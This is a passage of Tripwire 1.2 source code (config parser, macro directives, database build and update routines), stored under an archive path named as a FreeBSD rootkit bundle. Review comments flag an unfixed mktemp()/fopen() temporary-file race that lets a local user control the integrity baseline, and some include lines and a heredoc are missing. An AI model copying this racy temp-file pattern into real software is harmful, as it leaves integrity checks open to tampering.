word word { check_varname($2->string); tw_mac_define($2->string, $3->string); $$ = NULL; } | UNDEF word { check_varname($2->string); tw_mac_undef($2->string); $$ = NULL; } | IFDEF if_expr { $1 = $2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFNDEF if_expr { $1 = !$2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFHOST host_expr { $1 = $2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | IFNHOST host_expr { $1 = !$2; } EOL colines else ENDIF { if ($1) { $$ = $5; } else { $$ = $6; } /* linenumber++; */ } | INCLUDE word { /* push a new @@include file onto the include stack */ include_push($2->string, &yyin); $$ = NULL; } | CONTENTS word { char *pc = "@@contents "; /* record contents in list */ list_set($2->string, "", 0, pp_entry_list_global); /* reconstruct and emit the entire string */ $$ = (char *) malloc((unsigned) (strlen($2->string) + strlen(pc)) + 1); (void) strcpy($$, pc); (void) strcat($$, $2->string); /* free up the right side */ free($2->string); free($2); } | ECHOTHIS words { fprintf(stderr, "tw.config: echo: %s\n", $2); $$ = NULL; } | DBASEVERSION word { int version; if (sscanf($2->string, "%d", &version) != 1) { yyerror(""); } /* check if the database format is too old */ if (version != db_version_num) { fprintf(stderr, "error: database format %d is no longer supported!\n\tSee tw.config(5) manual page for details)\n\t'%s' (expecting version %d)!\n", version, currparsefile, db_version_num); exit(1); } /* free up the right side */ free($2->string); free($2); /* we must see one of these productions in the file */ found_db_version = 1; $$ = NULL; } ; words : words word { /* concatenate the two terminals together */ if ($1 == NULL) { $$ = (char *) malloc((unsigned) strlen($2->string) + 1); $$[0] = '\0'; } else { $$ = (char *) malloc((unsigned) (strlen($1) + strlen($2->string)) + 2); (void) strcpy($$, $1); /* XXX: This doesn't 
work! if ($2 && (!$2->directive)) */ if ($2) (void) strcat($$, " "); /* free up the left component */ free($1); } (void) strcat($$, $2->string); /* free up the right component */ if ($2) { free($2->string); free($2); } SPDEBUG(11) printf("--(words)--> (%s)\n", $$); } | { $$ = NULL; } ; word : STRING { struct comp *pcomp; char *pc; $$ = (struct comp *) malloc(sizeof(struct comp)); pc = $1; $$->string = strcpy((char *) malloc((unsigned) strlen($1) + 1), $1); $$->directive = 0; } ; %% #include "lex.yy.c" /*ARGSUSED*/ yyerror(s) char *s; { fprintf(stderr, "error: syntax error at line %d in config file\n\t'%s' !\n", ++linenumber, currparsefile); } /* * void * tw_macro_parse(char *filename, FILE *fpin, FILE *fpout, * struct list **pp_entry_list) * * wrapper around yyparse(), initiailzing input and output data. */ void tw_macro_parse(filename, fpin, fpout, pp_entry_list) char *filename; FILE *fpin, *fpout; struct list **pp_entry_list; { static int firsttime = 1; stackpointer = 0; /* set up input and output pointers */ yyin = fpin; yyout = fpout; #ifdef FLEX_SCANNER if (!firsttime) { yyrestart(yyin); } else { firsttime = 0; } #endif /* set up initial filename */ strcpy( currparsefile, filename ); pp_entry_list_global = pp_entry_list; (void) yyparse(); } /* counters odd behaviour of flex -- Simon Leinen */ #ifdef yywrap # undef yywrap #endif yywrap() { /* check to see if we've reached the bottom of the @@include stack */ if (include_pop()) { linenumber++; return 0; } /* close up parser */ return 1; } /* * static char * * string_dequote(char *s) * * remove pairs of quoted strings. */ static char * string_dequote(s) char *s; { char temp[1024]; /* do we need to do anything? */ if (s[0] != '"') { return s; } (void) strncpy(temp, s+1, strlen(s) - 2); (void) strcpy(s, temp); return s; } /* * void * include_push(char *filename, FILE **p_fp_old) * * return a stdio (FILE *) pointer to the opened (filename), saving * the old (FILE *) pointer and line number on the stack. 
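*
*	nothing is returned: the newly opened stream is stored through
*	(p_fp_old).  a full @@include stack, an allocation failure or a
*	file that cannot be opened ends the program.
*/

static void
include_push(filename, p_fp_old)
    char *filename;
    FILE **p_fp_old;
{
    FILE *fp;
    char *pc;
    extern int errno;

    /* check for stack overflow */
    if (stackpointer == INCLUDE_STACK_SZ) {
        fprintf(stderr, "error: too many nested includes at line %d in file\n\t'%s' !\n", linenumber, currparsefile);
        exit(1);
    }

    /* dequote the include filename */
    string_dequote(filename);

    /* save the old file pointer, filename, and linenumber on the stack */
    fp_stack[stackpointer] = *p_fp_old;
    if ((pc = (char *) malloc((unsigned) strlen(currparsefile) + 1)) == NULL) {
        perror("include_push: malloc()");
        exit(1);
    }
    (void) strcpy(pc, currparsefile);
    filename_stack[stackpointer] = pc;
    linenumber_stack[stackpointer++] = linenumber;

    /* try opening the file */
    if ((fp = fopen(filename, "r")) == NULL) {
        if (errno == ENOENT) {
            fprintf(stderr, "error: @@include '%s': file not found at line %d in config file\n\t'%s' !\n",
                filename, linenumber, currparsefile);
            exit(1);
        }
        else {
            char msg[100];

            /*
             * the name comes from the configuration file and may be far
             * longer than this buffer (an over-long name is exactly what
             * lands here, since it fails with something other than
             * ENOENT), so cap it: 88 + strlen(": fopen()") + 1 <= 100.
             */
            sprintf(msg, "%.88s: fopen()", filename);
            perror(msg);
            exit(1);
        }
    }

    /* replace old pointer with new */
    *p_fp_old = fp;

    /* reset line number and filename */
    linenumber = 0;
    strcpy( currparsefile, filename );
}

/*
 * FILE *
 * include_pop()
 *
 *	pop the last file structure off the @@include stack.
 *
 *	returns NULL when we've exhausted the stack.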
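*/

static FILE *
include_pop()
{
    /*
     * check for stack underflow.  the counter is only decremented when
     * there is something to pop, so a repeated call on an empty stack
     * can never index below fp_stack[0].
     */
    if (stackpointer == 0)
        return NULL;
    stackpointer--;

    (void) fclose(yyin);

    /* pop off the line numbers and the stdio file pointer */
    yyin = fp_stack[stackpointer];
#ifdef FLEX_SCANNER
    yyrestart(yyin);
#endif
    linenumber = linenumber_stack[stackpointer];
    strcpy( currparsefile, filename_stack[stackpointer] );

    /* the saved name was malloc()ed by include_push() */
    free(filename_stack[stackpointer]);
    filename_stack[stackpointer] = NULL;

    return yyin;
}

/*
 * int
 * check_varname(char *pc)
 *
 *	print a warning for every character of (pc) that is neither
 *	alphanumeric nor '_'.  always returns 0.
 */

int
check_varname(pc)
    char *pc;
{
    for (; *pc; pc++) {
        /* <ctype.h> wants an unsigned char value; plain char may be negative */
        if (!(isalnum((unsigned char) *pc) || (*pc == '_'))) {
            fprintf(stderr, "warning: illegal character '%c' in @@define at line %d in file\n\t'%s' !\n", *pc, linenumber, currparsefile);
        }
    }
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/src/config.prim.c100600 764 764 5675 5547660222 16471 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: config.prim.c,v 1.13 1994/04/04 00:34:26 gkim Exp $";
#endif

/*
 * config.prim.c
 *
 *	process configuration file directive primitives (ala m4 or cpp).
 *
 *		ifhost
 *		define
 *		undef
 *		ifdef
 *		ifndef
 *
 * Gene Kim
 * Purdue University
 * September 28, 1992
 */

#include "../include/config.h"
#include
#ifdef __STDC__
# include
# include
#endif
#ifdef STRINGH
#include
#else
#include
#endif
#include "../include/tripwire.h"
#include "../include/list.h"
#include
#include
#ifndef GETHOSTNAME
#include
#endif

#ifndef MAXHOSTNAMELEN
#define MAXHOSTNAMELEN 64
#endif

/* name --> value table behind the @@define family of directives */
static struct list *defines_table = (struct list *) NULL;

/*
 * void
 * tw_mac_define(char *varname, char *varvalue)
 *
 *	set (varname) to (varvalue) in the defines table
 */

void
tw_mac_define(varname, varvalue)
    char *varname, *varvalue;
{
    list_set(varname, varvalue, 0, &defines_table);
}

/*
 * char *
 * tw_mac_dereference(char *varname)
 *
 *	returns the (varvalue) in the defines table.
 */

char *
tw_mac_dereference(varname)
    char *varname;
{
    return list_lookup(varname, &defines_table);
}

/*
 * void
 * tw_mac_undef(char *varname)
 *
 *	removes (varname) from the defines table.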
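*/
void
tw_mac_undef(varname)
    char *varname;
{
    list_unset(varname, &defines_table);
}

/*
 * int
 * tw_mac_ifdef(char *varname)
 *
 *	returns 1 if (varname) is in defines table, else 0.
 */
int
tw_mac_ifdef(varname)
    char *varname;
{
    return list_isthere(varname, &defines_table);
}

/*
 * int
 * tw_mac_ifhost(char *hostname)
 *
 *	returns 1 if (hostname) matches our hostname, else 0.  The match is
 *	case insensitive and covers the whole name.  A warning is printed
 *	when (hostname) has no '.' but the local name does.
 *
 *	The result decides which @@ifhost sections of the configuration
 *	apply on this machine, so the local name is always terminated
 *	before it is read.
 */
int
tw_mac_ifhost(hostname)
    char *hostname;
{
    char realhostname[MAXHOSTNAMELEN];
    register char *tc, *sc;

#ifndef GETHOSTNAME
    struct utsname sysinfo;

    if (uname(&sysinfo) < 0)
        die_with_err("filename_hostname_expand: uname()", (char *) NULL);

    (void) strncpy(realhostname, sysinfo.nodename, MAXHOSTNAMELEN);
#else	/* GETHOSTNAME */
    /* get the hostname */
    if (gethostname(realhostname, MAXHOSTNAMELEN) < 0)
        die_with_err("filename_hostname_expand: gethostname()", (char *) NULL);
#endif	/* GETHOSTNAME */

    /*
     * neither strncpy() nor gethostname() promises a terminator when the
     * name fills the buffer; without one the strchr() and the compare
     * loop below would read past realhostname[].
     */
    realhostname[MAXHOSTNAMELEN - 1] = '\0';

    /* check for a period in the hostname (only if there are periods in the
     * the real hostnames)
     */
    if (!strchr(hostname, '.') && strchr(realhostname, '.')) {
        fprintf(stderr, "warning: hostname in @@ifhost directives must be fully qualified!\n");
        fprintf(stderr, "\t\t(e.g. 'mentor.cc.purdue.edu')\n");
    }

    /*
     * check for a match between the hostnames (case insensitive).
     * The casts keep the <ctype.h> argument in the unsigned char range.
     */
    for (sc = realhostname, tc = hostname; *sc && *tc ; sc++, tc++) {
        if (tolower((unsigned char) *tc) != tolower((unsigned char) *sc))
            return 0;
    }

    /* equal only if both strings ended together */
    return (!(*tc || *sc));
}
fbsdrootkit-1.2/tripwire-1.2/src/dbase.build.c100600 764 764 35235 5614754431 16446 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: dbase.build.c,v 1.32 1994/07/25 15:24:09 gkim Exp $";
#endif

/*
 * dbase.build.c
 *
 *	build the preen.database file with the list of files that
 *	was generated by config.parse.c
 *
 * Gene Kim
 * Purdue University
 * September 27, 1992
 */

/* NOTE(review): the <...> header names below were lost when this listing was extracted. */
#include "../include/config.h"
#include
#ifdef STDLIBH
#include
#include
#endif
#include
#if !defined(SYSV) || (SYSV > 3)
# include
#else
# include
#endif	/* SYSV */
#include
#include
#include
#ifndef NOGETTIMEOFDAY
# include
#else
# include
#endif	/* NOGETTIMEOFDAY */
#ifdef DIRENT
# include
#else
# ifndef XENIX
# include
# else	/* XENIX */
# include
# endif	/* XENIX */
#endif	/* DIRENT */
#if (defined(SYSV) && (SYSV < 3))
# include
#endif	/* SVR2 */
#ifdef STRINGH
#include
#else
#include
#endif
#include "../include/list.h"
#include "../include/tripwire.h"

#if defined(SYSV) && (SYSV < 4)
#ifndef HAVE_LSTAT
# define lstat(x,y) stat(x,y)
#endif
#endif	/* SYSV */

#ifndef SEEK_SET
# define SEEK_SET L_SET
#endif

int files_scanned_num = 0;

/* prototypes */
char *mktemp();
static void database_record_write();

char backupfile[MAXPATHLEN+256];

/*
 * database_build(struct list **pp_list, int tempdatabaseflag)
 *
 *	take the list of file elements from the list and store all of
 *	the pertinent inode and signature information in the database
 *	file.
 *
 *	if (tempdatabaseflag) is set, then we write to a private file
 *	in the /tmp directory.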
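*/
extern int numinterupdated;

/*
 * Arguments, as the body uses them:
 *
 *	pp_list       - list of files to record; each varvalue is parsed as
 *			"<entrynum> <ignorevec>".
 *	mode          - DBASE_TEMPORARY writes to a mktemp() name built from
 *			TEMPFILE_TEMPLATE, DBASE_UPDATE writes to
 *			./databases/<database_file> after copying the old
 *			database to ./databases/<database_file>.old, and any
 *			other value writes to <database_path>/<database_file>.
 *	pp_entry_list - configuration entries, written as "@@contents" lines
 *			unless mode is DBASE_TEMPORARY.
 *
 * Unrecoverable errors end the program via die_with_err() or exit(1).
 */
void
database_build (pp_list, mode, pp_entry_list)
    struct list **pp_list;
    int mode;
    struct list **pp_entry_list;
{
    struct list_elem *p_fileentry;
    struct list_elem *p_configentry;
    FILE *fpw;
    char database[MAXPATHLEN+256];
    int entrynum, oldumask;
    extern int errno;
#ifndef NOGETTIMEOFDAY
    struct timezone tzone;
    struct timeval tval;
#else
    time_t tval;
#endif	/* XENIX */

    if (!quietmode) {
        fprintf(stderr, "### Phase 3: %s file information database\n",
                mode == DBASE_UPDATE ? "Updating" : "Creating");
    }

    /* create the database file
     *		if we are making the permanent database, then we write
     *		to the specified file.
     *
     *		else, we create a temporary file, and save the name of it.
     */

    /* XXX - we should use open() so we can set the modes */

    /* owner-only permissions for whatever file is created below */
    oldumask = umask(077);

    /* where do we write the new database? */
    if (mode == DBASE_TEMPORARY) {
        char *tmpfilename = (char *) malloc(strlen(TEMPFILE_TEMPLATE)+1);

        if (tmpfilename == NULL)
            die_with_err("malloc() failed in database_build", (char *) NULL);
        (void) strcpy(tmpfilename, TEMPFILE_TEMPLATE);

        /*
         * NOTE(review): mktemp() only picks a name; the file is created
         * later by fopen(database, "w"), which follows symbolic links and
         * does not fail if the name already exists.  Another local user
         * who can write to the temporary directory can create that name
         * in between and so choose what this program writes to and later
         * reads back as its baseline.  Creating the file atomically
         * (open() with O_CREAT|O_EXCL, or mkstemp(), then fdopen()) closes
         * the window; not changed here because the target platforms of
         * this file are not visible from the listing.
         */
        if ((char *) mktemp(tmpfilename) == NULL)
            die_with_err("database_build: mktemp()", (char *) NULL);

        (void) strcpy(tempdatabase_file, tmpfilename);
        (void) strcpy(database, tempdatabase_file);
        free(tmpfilename);
    }	/* end if temporary database */
    else if (mode == DBASE_UPDATE) {
        sprintf(database, "./databases/%s", database_file);
    }	/* end if update mode */
    else {
        sprintf(database, "%s/%s", database_path, database_file);
    }	/* end if non-temporary database */

    /* back up any existing database */
    if (mode == DBASE_UPDATE) {
        FILE *fpin, *fpout;
        char backup[MAXPATHLEN+256];
        char olddatabase[MAXPATHLEN+256];
        register int ctemp;

        /* never print an uninitialized name in the messages below */
        olddatabase[0] = '\0';

        /* get a file descriptor to the old database, so we can open it
         * and make a backup copy
         */
        if (specified_dbasemode) {
            /* name it first so the error message has something to show */
            if (specified_dbasemode == SPECIFIED_FILE)
                strcpy(olddatabase, specified_dbasefile);
            if (!(fpin = (FILE *) fdopen(specified_dbasefd, "r"))) {
                die_with_err("database_build: Couldn't open database `%s':",
                             olddatabase);
            }
            rewind(fpin);
            if (ftell(fpin) != 0) {
                die_with_err("database_build: ftell()", NULL);
            }
        } else {
            /* what should we call the old database? */
            sprintf(olddatabase, "%s/%s", database_path, database_file);
            if ((fpin = fopen(olddatabase, "r")) == NULL) {
                die_with_err("database_build: Couldn't open database `%s':",
                             olddatabase);
            }
        }

        /* we hard code this, since we always want the new diretory placed
         * relative to our position
         */
        sprintf(backupfile, "%s.old", database_file);

        /* make sure we stay underneath maximum file length */
        if ((int)(strlen(database_file) + 4) > MAXNAMLEN) {
            /*
             * tack on .old as well as it fits.  This has to edit
             * backupfile: the original wrote into (backup), which is
             * still unset here and is overwritten by the sprintf() below,
             * so the name was never shortened.
             */
            (void) strcpy(backupfile + (MAXNAMLEN - 4), ".old");
        }

        /* so we can reference it later */
        (void) sprintf(backup, "./databases/%s", backupfile);
        /*
        (void) strcpy(backupfile, backup);
        strlen(./Databases/) == 12
        */

        SPDEBUG(3)
        printf("database_build(): ---> olddatabase = (%s)\n", olddatabase);

        if ((fpout = fopen(backup, "w")) == NULL)
            die_with_err("Couldn't open '%s'!\n", backup);

        /* make the backup file */
        while ((ctemp = getc(fpin)) != EOF)
            putc((char) ctemp, fpout);

        /* a caller-supplied descriptor stays open for the caller */
        if (!specified_dbasemode)
            (void) fclose(fpin);
        (void) fclose(fpout);

        /* print banner (in case user stops program during database update) */
        if (!quietmode) {
            fputs("###\n", stderr);
            fprintf(stderr,
                    "### Old database file will be moved to `%s'\n", backupfile);
            fputs("###            in ./databases.\n", stderr);
            fputs("###\n", stderr);
            fprintf(stderr,
                    "### Updated database will be stored in '%s'\n", database);
            fprintf(stderr,
                    "### (Tripwire expects it to be moved to '%s'.)\n", database_path);
            fputs("###\n", stderr);
        }
    }

    /* rebuild the database */
    if ((fpw = fopen(database, "w")) == NULL)
        die_with_err("Hint: Maybe the database directory '%s' doesn't exist? fopen()", database);

    (void) umask(oldumask);

    /* get time information for banner */
#ifndef NOGETTIMEOFDAY
    if (gettimeofday(&tval, &tzone) < 0)
        die_with_err("gettimeofday()", (char *) NULL);
#else
    tval = time((time_t *) 0);
#endif	/* XENIX */

    /* add a banner to the top of the database file */
    /* note that the newline comes from date */
    {
        char timestring[30];

        /* NOTE(review): the cast assumes tval starts with a time_t seconds field */
        strncpy(timestring, ctime((time_t *)&tval), 26);
        fprintf(fpw, "# Generated by Tripwire, version %s on %s", version_num,
                timestring);
        fprintf(fpw, "@@dbaseversion %d\n", db_version_num);
    }

    /* we use &filelist as the key */
    if (list_open(pp_list) < 0)
        die_with_err("database_build: list_open() failed!\n", (char *) NULL);

    while ((p_fileentry = list_get(pp_list)) != NULL) {
        struct stat statbuf;
        char filename[2048], ignorevec[512];

        /*
         * if we're in UPDATE mode, we simply copy entries unless
         * FLAG_UPDATE is set.
         */
        if (mode == DBASE_UPDATE) {
            int flagval;

            flagval = list_getflag(p_fileentry->varname, pp_list);
            if (!(flagval & FLAG_UPDATE)) {
                fprintf(fpw, "%s %s", filename_escape(p_fileentry->varname),
                        p_fileentry->varvalue);
                SPDEBUG(10)
                printf("database_build(): --(dumping, flag=%d)--> %s\n",
                       flagval, p_fileentry->varname);
                continue;
            }
            else {
                SPDEBUG(10)
                printf("database_build(): --(will update, flag=%d)--> %s\n",
                       flagval, p_fileentry->varname);
            }
        }

        /*
         * get the stat information on it.  Stop rather than overflow
         * filename[] or leave a file out of the baseline unnoticed.
         */
        if (strlen(p_fileentry->varname) >= sizeof(filename)) {
            fprintf(stderr, "database_build: filename too long!\n");
            fprintf(stderr, ">> %s\n", p_fileentry->varname);
            exit(1);
        }
        strcpy(filename, p_fileentry->varname);

        /* %511s keeps the ignore vector inside ignorevec[512] */
        if (sscanf(p_fileentry->varvalue, "%d %511s", &entrynum, ignorevec) != 2)
            die_with_err("database_build: sscanf() parsing error!\n",
                         (char *) NULL);

        if (lstat(filename, &statbuf) < 0) {
            if (errno == ENOENT) {
                fprintf(stderr,
                        "%s: %s: disappeared.  Skipping...\n", progname, filename);
                continue;
            }
            else
                die_with_err("database_build: lstat()", filename);
        }

        /* pick up NO_OPEN flag if we're in UPDATE mode
         *
         * if it is a special file or device, add it to the list, but
         * make sure we don't open it and read from it!
         */
        if (mode == DBASE_UPDATE)
        switch (statbuf.st_mode & S_IFMT) {
          case S_IFIFO:
          case S_IFCHR:
          case S_IFDIR:
          case S_IFBLK:
#if !defined(SYSV) || (SYSV > 3)
#ifndef apollo
          /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */
          case S_IFSOCK:
#endif
#endif
            (void) list_setflag(filename, FLAG_NOOPEN, pp_list);
            break;
#if !defined(SYSV) || (SYSV > 3)
          case S_IFLNK:	/* if it's a symbolic link, make sure we flag it as such! */
            (void) list_setflag(filename, FLAG_SYMLINK, pp_list);
            break;
#endif
        }

        database_record_write(fpw, filename, p_fileentry->flag, ignorevec,
                              &statbuf, entrynum);

        files_scanned_num++;
    }	/* end while list_read() */

    /* cleanup */
    if (list_close(pp_list) < 0)
        die_with_err("database_build: list_close() failed!\n", (char *) NULL);

    /* print out table of contents in permanent database */
    if (mode != DBASE_TEMPORARY) {

        /* we use &pp_entry_list as the key */
        if (list_open(pp_entry_list) < 0)
            die_with_err("database_build: list_open() failed!\n", (char *) NULL);

        /* print out the contents */
        while ((p_configentry = list_get(pp_entry_list)) != NULL) {
            char entry[2048];
            int err;

            /* %2047s keeps the field inside entry[2048] */
            if ((err = sscanf(p_configentry->varvalue, "%2047s", entry)) != 1) {
                fprintf(stderr, "database_build: parse error (nfields=%d)!\n", err);
                fprintf(stderr, ">> %s\n", p_configentry->varvalue);
                exit(1);
            }

            /* skip those reverse index entries */
            if (p_configentry->flag)
                continue;

            fprintf(fpw, "@@contents %s %s\n",
                    filename_escape(p_configentry->varname), entry);
            SPDEBUG(10)
            printf("--(contents)-->%s\n", entry);
        }

        /* close the list */
        if (list_close(pp_entry_list) < 0)
            die_with_err("database_build: list_close() failed!\n", (char *) NULL);
    }

    /* we don't want to allow anyone to spoof the temporary file in /tmp */
    if (mode == DBASE_TEMPORARY) {
        /*
         * NOTE(review): freopen() is given the file name again, so the
         * stream handed on in fptempdbase belongs to whatever that name
         * refers to now -- confirm this is acceptable for a file in a
         * shared temporary directory.
         */
        if ((fptempdbase = freopen(database, "r", fpw)) == NULL)
            die_with_err("temporary database file disappeared?!?", database);
        rewind(fptempdbase);
    } else {
        fclose(fpw);
    }

    return;
}

/*
 * database_record_write(FILE *fpw, char *filename, int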
flags, * char *ignorevec, struct stat *statbuf, * int entrynum) * * write out the pertinent information of the specifed file to the * database. * * gather the signatures, and include that in the info going to * to the database. * * (entrynum) is the unique entry number tag from tw.config. */ static void database_record_write (fpw, filename, flags, ignorevec, statbuf, entrynum) FILE *fpw; char *filename; int flags; char *ignorevec; struct stat *statbuf; int entrynum; { static int fdsymlink = -1; /* to store contents of readlink() */ char sigs[NUM_SIGS][SIG_MAX_LEN]; int fd, i; int ignoremask; char vec64_a[50]; char vec64_c[50]; char vec64_m[50]; char sigs_concat[NUM_SIGS * SIG_MAX_LEN]; /* filename, entrynum, ignore, mode, inode, nlinks, uid, gid, size, * access, modify, ctime, {sig0, sig1, ..., sig9} */ static char *format = "%s %ld %s %lo %ld %ld %ld %ld %ld %s %s %s %s\n"; /* initialize our temporary file */ if (fdsymlink == -1) { fdsymlink = fd_tempfilename_generate(); } if (verbosity) { fprintf(stderr, "scanning: %s\n", filename); } /* * check for NOOPEN flag (for special files that shouldn't be * read from, like devices); we make up null signatures. */ if (flags & FLAG_NOOPEN) { for (i = 0; i < NUM_SIGS; i++) { register char *pc = sigs[i]; *pc++ = '0'; *pc++ = ' '; *pc++ = '\0'; } goto SKIPPED_SIGS; } /* * New for Tripwire v1.1.1: (adapted from Paul Szabo and Spaf) * * We open up symbolic links and store its signature in the database * Because I'm lazy, I open it, write it out to a temporary file * and feed it to the normal signature generation routines. */ #if !defined(SYSV) || (SYSV > 3) else if (flags & FLAG_SYMLINK) { char linkcontents[MAXPATHLEN+256]; int err, slen; if ((err = readlink(filename, linkcontents, sizeof(linkcontents))) < 0) { warn_with_err("couldn't read symbolic link for '%s'", filename); return; } /* Ensure null termination (may already have truncated string) */ /* * Some versions of readlink return null-terminated strings * (e.g. 
Apollo SR10.4) (but only if there is room); * some other versions do not bother (e.g. Apollo SR10.2). */ if (err < sizeof(linkcontents)) linkcontents[err] = '\0'; else linkcontents[sizeof(linkcontents)-1] = '\0'; slen = strlen(linkcontents); if (ftruncate(fdsymlink, 0) < 0) { die_with_err("truncate()", NULL); } if (lseek(fdsymlink, 0, SEEK_SET) < 0) { die_with_err("lseek()", NULL); } if ((err = write(fdsymlink, linkcontents, slen)) != slen) { warn_with_err("couldn't write symbolic link info for '%s'", filename); return; } } else { /* descriptor for signature functions */ if ((fd = open(filename, O_RDONLY)) < 0) { /* skip it if we had an error */ warn_with_err("Trying to open %s for signature", filename); return; } } #else /* descriptor for signature functions */ if ((fd = open(filename, O_RDONLY)) < 0) { /* skip it if we had an error */ warn_with_err("Trying to open %s for signature", filename); return; } #endif /* first find out which signatures we don't need to collect */ ignoremask = ignore_vec_to_scalar(ignorevec); /* collect signatures */ for (i = 0; i < NUM_SIGS; i++) { char *pc = sigs[i]; /* do we skip this signature? 
*/ if ((ignoremask & (IGNORE_0 << i)) || (runtimeignore & (IGNORE_0 << i))) (void) strcpy(pc, "0 "); else { /* special file descriptor for those symbolic links */ if (flags & FLAG_SYMLINK) (*pf_signatures[i])(fdsymlink, pc, SIG_MAX_LEN); else (*pf_signatures[i])(fd, pc, SIG_MAX_LEN); (void) strcat(pc, " "); } } /* close up the descriptor, since we're done */ if (!(flags & FLAG_SYMLINK)) (void) close(fd); SKIPPED_SIGS: /* concatenate all the signature */ sigs_concat[0] = '\0'; for (i = 0; i < NUM_SIGS; i++) strcat(sigs_concat, sigs[i]); /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, modify, * ctime, sig0, sig1, ..., sig9 */ SPDEBUG(6) printf("--(database_record_write)--> %s\n", filename); { time_t va = statbuf->st_atime, vm = statbuf->st_mtime, vc = statbuf->st_ctime; fprintf(fpw, format, filename_escape(filename), (int32)entrynum, ignorevec, (int32)statbuf->st_mode, (int32)statbuf->st_ino, (int32)statbuf->st_nlink, (int32)statbuf->st_uid, (int32)statbuf->st_gid, (int32)statbuf->st_size, pltob64((uint32 *) &va, (char *) vec64_a, 1), pltob64((uint32 *) &vm, (char *) vec64_m, 1), pltob64((uint32 *) &vc, (char *) vec64_c, 1), sigs_concat); } return; } fbsdrootkit-1.2/tripwire-1.2/src/dbase.update.c100600 764 764 6313 5612106414 16572 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: dbase.update.c,v 1.16 1994/07/17 01:44:44 gkim Exp $"; #endif /* * dbase.update.c * * build the preen.database file with the list of files that * was generated by config.parse.c * * Gene Kim * Purdue University */ #include "../include/config.h" #include #include #ifdef STDLIBH # include #endif #include #include #include #ifdef STRINGH #include #else #include #endif #include #include "../include/list.h" #include "../include/tripwire.h" #include /* * dbase_entry_flag () * * mark all entries with the given entrynumber (flagentry) with (orflag). * if (ignorevec) is non-NULL, then splice it in as the new ignore * vector. 
*/ void dbase_entry_flag (pp_list, flagentry, orflag, ignorevec) struct list **pp_list; int flagentry; int orflag; char *ignorevec; { struct list_elem *p_fileentry; char trash[1024]; int entry; int err; /* use pp_list as key */ if (list_open(pp_list) < 0) { fputs("database_update: list_open() failed!\n", stderr); exit(1); } /* foreach file entry */ while ((p_fileentry = list_get(pp_list)) != NULL) { if ((err = sscanf(p_fileentry->varvalue, "%d %s", &entry, trash)) < 2) { fprintf(stderr, "dbase_entry_flag: sscanf() parse error, returned %d!\n", err); exit(1); } /* flag if entry number match */ if (entry == flagentry) { int flags, newflag; char pcname[MAXPATHLEN+1]; strcpy(pcname, p_fileentry->varname); /* exception list */ flags = list_getflag(pcname, pp_list); list_setflag(pcname, (orflag)|flags, pp_list); newflag = list_getflag(pcname, pp_list); SPDEBUG(3) fprintf(stderr, "dbase_entry_flag: found %s (entry=%d), oldflag=%d, newflag=%d\n", pcname, flagentry, flags, newflag); /* do we replace the ignorevector? */ if (ignorevec) { int entrynum; char oldignore[512], oldrest[2048]; char newvalue[2048]; /* parse the old dbase entry */ if ((err = sscanf(p_fileentry->varvalue, "%d %s %[^\n]", &entrynum, oldignore, oldrest)) != 3) { /* was it just added? */ if (list_getflag(pcname, pp_list) & FLAG_UPDATE) { SPDEBUG(3) printf("\t(it's already a newly file...)\n"); continue; } fprintf(stderr, "dbase_entry_flag: list parse error (nfields=%d)!\n", err); fprintf(stderr, "%s>> %s\n", pcname, p_fileentry->varvalue); exit(1); } /* splice the new ignore flag */ sprintf(newvalue, "%d %s %s\n", entrynum, ignorevec, oldrest); /* they should be the same, since ignorevecs are the only * things that changed */ assert(strlen(p_fileentry->varvalue) == strlen(newvalue)); list_set(pcname, newvalue, MAXPATHLEN+1, pp_list); } list_setflag(pcname, (orflag)|flags, pp_list); /* printf("%s: %d\n", pcname, flags); */ if (flags & FLAG_NOOPEN) { if (verbosity) fprintf(stderr, "%s is a special file! 
Skipping...\n", pcname); continue; } } } /* close up the list */ if (list_close(pp_list) < 0) { fputs("database_update: list_close() failed!\n", stderr); exit(1); } } fbsdrootkit-1.2/tripwire-1.2/src/help.sh100700 764 764 1113 5547660226 15362 0ustar dfdf#!/bin/sh # $Id: help.sh,v 1.5 1994/04/04 00:34:30 gkim Exp $ # # This file generates 'help.c' from the text in 'help.txt' # # Gene Kim # Purdue University # May 5, 1993 # if [ $# -ne 1 ] then echo 'help.sh: run this from the Makefile!' exit 1 fi # print out header of help.c cat < void tw_help_print(fp) FILE *fp; { EOF # wrap text from help.txt sed 's/ /\\t/g' < $1 | \ awk '!/^#/ { printf( "\tfprintf(fp, \"\t%s\\n\");\n", $0); }' # footer to help.c cat <>> START HERE <<< Inode information summary: ========================== st_mode: states the protection mode-bits that are associated with the file. (i.e., read, write, and execute permission bits). st_ino: the inode number, which uniquely labels the file within the filesystem. st_nlink: the number of links to a file which exist. (Adding a hard-link to a file or creates a subdirectory adds one to this number.) st_uid: the user-id of the file owner. st_gid: the group-id of the file owner. st_size: the size (in bytes) of the file. st_atime: the timestamp of the last file access. st_mtime: the timestamp of the last file modification. st_ctime: the timestamp of the last inode update. sig[0..9]: the 'fingerprint' yeilded by each signature routine. 
